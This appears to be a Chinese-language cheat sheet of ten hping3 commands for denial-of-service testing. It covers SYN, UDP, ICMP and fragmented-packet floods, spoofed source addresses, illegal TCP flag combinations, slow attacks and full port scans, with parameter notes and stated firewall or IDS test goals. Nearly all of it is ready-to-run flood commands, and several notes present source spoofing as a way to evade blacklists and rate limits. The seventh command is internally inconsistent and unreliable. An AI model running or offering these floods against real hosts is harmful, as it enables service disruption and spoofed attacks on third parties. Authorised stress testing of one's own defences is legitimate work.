一、高强度 SYN 洪水(TCP 半连接攻击)
命令:
sudo hping3 -S -p 80 --flood --rand-source -d 512 -w 128 -c 50000 目标IP
参数解析:
-S
:发送 SYN 包(模拟 TCP 握手请求)。
--flood
:洪水模式(最大速率发包)。
--rand-source
:随机伪造源 IP(绕过 IP 黑名单)。
-d 512
:每个包携带 512 字节的随机数据。
-w 128
:设置 TCP 窗口大小为 128 字节。
-c 50000
:发送 50,000 个包后停止。
-p 80
:目标为 HTTP 服务端口。
测试目的:
- 测试服务器处理海量半开连接(SYN_RECV 状态)的能力。
- 验证防火墙是否能识别并拦截伪造源 IP 的洪水流量。
二、分片包攻击(绕过防火墙规则)
命令:
sudo hping3 -S -p 443 --frag --more-frag -d 2048 --flood 目标IP
参数解析:
--frag
:启用数据包分片。
--more-frag
:标记分片包为“更多分片”(模拟复杂分片攻击)。
-d 2048
:每个包总大小 2048 字节(强制分片)。
-p 443
:目标为 HTTPS 端口。
测试目的:
- 测试防火墙/IDS 能否正确重组分片包并检测恶意内容。
- 验证服务器 TCP 栈处理异常分片的能力。
三、UDP 洪水攻击(模拟 DDoS 反射攻击)
命令:
sudo hping3 --udp -p 53 --flood --rand-source -a 8.8.8.8 --data 200 目标IP
参数解析:
--udp
:使用 UDP 协议。
-p 53
:目标为 DNS 服务端口(常见反射攻击源)。
-a 8.8.8.8
:伪造源 IP 为 8.8.8.8
(模拟 DNS 反射攻击)。
--data 200
:每个包携带 200 字节数据(模拟 DNS 响应负载)。
测试目的:
- 测试防火墙能否识别伪造源 IP 的 UDP 流量。
- 验证服务器对 UDP 泛洪的带宽和包处理能力。
四、混合标志位攻击(触发 IDS/IPS 规则)
命令:
sudo hping3 -p 22 -S -F -A -U -P -R -c 1000 --flood 目标IP
参数解析:
-S -F -A -U -P -R
:同时设置 SYN、FIN、ACK、URG、PSH、RST 标志位(非法组合)。
-p 22
:目标为 SSH 端口(高价值服务)。
-c 1000
:发送 1000 个异常包。
测试目的:
- 测试 IDS/IPS 是否检测到异常 TCP 标志位组合。
- 验证服务器对畸形包的处理逻辑(是否崩溃或丢弃)。
五、慢速攻击(Low & Slow 资源耗尽)
命令:
hping3 -S -p 80 --keep -i u10000 --rand-source 目标IP
参数解析:
--keep
:持续发包直到手动停止(Ctrl+C
)。
-i u10000
:每 10 毫秒发送一个包(低速但持久)。
--rand-source
:随机源 IP(绕过单 IP 速率限制)。
测试目的:
- 模拟慢速攻击,长期占用服务器连接资源。
- 测试防火墙的慢连接检测和自动清理机制。
六、ICMP 洪水(模拟 Ping 泛洪)
命令:
sudo hping3 --icmp --flood -d 1000 --rand-source 目标IP
参数解析:
--icmp
:发送 ICMP Echo 请求(类似 Ping)。
-d 1000
:每个 ICMP 包携带 1000 字节数据(大包攻击)。
--flood
:高速发包。
测试目的:
- 测试服务器对 ICMP 洪水的处理能力。
- 验证防火墙是否限制 ICMP 流量速率。
七、精准 HTTP 层攻击(应用层压测)
命令:
sudo hping3 -p 80 -S --data 500 --dport 80 --flood 目标IP --data "GET /heavy-resource HTTP/1.1\r\nHost: example.com\r\n\r\n"
参数解析:
--data "GET ..."
:自定义 HTTP 请求(模拟访问高负载页面)。
-d 500
:填充数据包总长度为 500 字节。
测试目的:
- 测试 Web 服务器处理大量 HTTP GET 请求的能力。
- 验证 WAF 是否过滤恶意请求(需构造更复杂的 Payload)。
八、随机端口扫描 + 攻击组合
命令:
sudo hping3 --rand-source -S --scan 1-65535 -p ++1 目标IP
参数解析:
--scan 1-65535
:扫描所有端口。
-p ++1
:每次递增端口号。
--rand-source
:随机源 IP(隐蔽扫描)。
测试目的:
- 测试防火墙是否屏蔽非常用端口的扫描行为。
- 验证 IDS 对分布式端口扫描的检测能力。
九、IP 协议号混淆(非 TCP/UDP/ICMP)
命令:
sudo hping3 --rawip -H 253 -p 80 --flood --rand-source 目标IP
参数解析:
--rawip
:使用原始 IP 协议(非 TCP/UDP)。
-H 253
:设置 IP 协议号为 253(非常用协议号)。
测试目的:
- 测试防火墙对非标准协议流量的处理策略(允许/拦截)。
- 验证服务器是否会因未知协议消耗 CPU 资源。
十、多向量组合攻击(复杂场景)
命令:
sudo hping3 -S -p 80 --flood --rand-source --frag -d 1500 --ttl 128 -w 256 目标IP
参数解析:
--ttl 128
:设置数据包 TTL 为 128(模拟正常流量)。
-w 256
:TCP 窗口大小设为 256 字节。
- 组合使用分片(
--frag
)、随机源 IP 和洪水模式。
测试目的:
- 模拟复杂攻击(分片 + 随机源 + 大包),测试综合防护能力。
- 验证防火墙策略是否能叠加生效(如分片重组 + IP 信誉库)。